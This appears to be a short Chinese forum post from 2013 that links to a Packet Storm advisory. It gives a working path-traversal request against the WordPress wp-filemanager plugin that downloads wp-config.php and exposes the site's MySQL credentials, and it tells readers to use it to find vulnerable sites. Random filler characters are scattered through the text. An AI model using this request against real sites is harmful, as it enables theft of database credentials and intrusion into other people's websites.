洞详解:http://packetstormsecurity.com/f ... -File-Download.html
/ {* `$ D) A1 u& w6 A# Y# x8 U
3 n/ `$ D0 q& N* N) Z- L查找漏洞网站:访问/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download,下载wp-config,其中回显MySQL。$ [: X' w5 p8 I: d- K4 N, B* _) I
|
发表于 2013-7-26 12:43:45
收藏
支持
反对